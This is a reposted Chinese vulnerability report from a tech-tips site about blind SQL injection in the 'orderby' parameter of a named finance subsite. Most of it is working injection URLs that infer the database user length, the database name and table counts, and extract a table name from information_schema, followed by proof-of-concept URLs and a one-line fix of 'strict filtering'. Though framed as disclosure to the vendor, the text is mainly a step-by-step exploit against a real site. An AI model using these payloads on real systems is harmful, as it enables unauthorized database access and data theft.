• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    凤凰网财经分站注入,可获取数据库内容

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    首先
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-(length(user())>22)*8000)&ordertype=asc返回页面
     
     


     
    而后尝试几个值,到
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-(length(user())=22)*8000)&ordertype=asc返回页面
     
     


     
    判定user()长度为22个字符,这里已经可以判断出这是一个注入点,为了让管理认识到危害,我们接着往下暴数据
     
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-(ascii(substring((database()),1,1))=102)*8000)&ordertype=asc依次往下,涛涛电脑知识网,获取库名为finance
     
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-((select count(*) from information_schema.tables where table_schema=0x66696E616E6365)=136)*8000)&ordertype=asc看来有136个表,这里我们只跑出一个表就可以了,毕竟只是提醒厂商修复漏洞,而不是做渗透测试
     
    ?pj_type=CHENXING&fund_type=gp&orderby=abs%28jjdm-%28length%28%28select%20distinct%20table_name%20from%20information_schema.tables%20where%20table_schema=0x66696E616E6365%20limit%201,1%29%29=6%29*8000%29&ordertype=asc这里我挑一个短的,第二个表长度为6,并且遇到了一个问题,有时不管表达式是真或假,都会返回这样一个页面
     
     



    没有返回有股票信息的页面,让我无法判断,后来发现有些出现这种错误的页面在表达式后面加上注释符可以解决,不过并不完美,还是有一些时候会出现这种错误,希望各位大牛指点一下,不只是这种,sleep也是,某些页面不管用>100 =100或者<100都不会延迟
    最后
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-(ascii(substring((select distinct table_name from information_schema.tables where table_schema=0x66696E616E6365 limit 1,1),1,1))=97)*8000)#&ordertype=asc这种形式爆出该表名称为all_hq
    至此检测结束,希望厂家尽快修复
    漏洞证明:
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-(length(user())=22)*8000)&ordertype=asc
     
    ?pj_type=CHENXING&fund_type=gp&orderby=abs(jjdm-(ascii(substring((database()),7,1))=101)*8000)&ordertype=asc

    修复方案:

    严格过滤
    作者 HRay
    ,涛涛电脑知识网

  • 上一篇:QQ邮箱预览word附件造成的xss漏洞
  • 下一篇:ewebeditor上的那些事
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1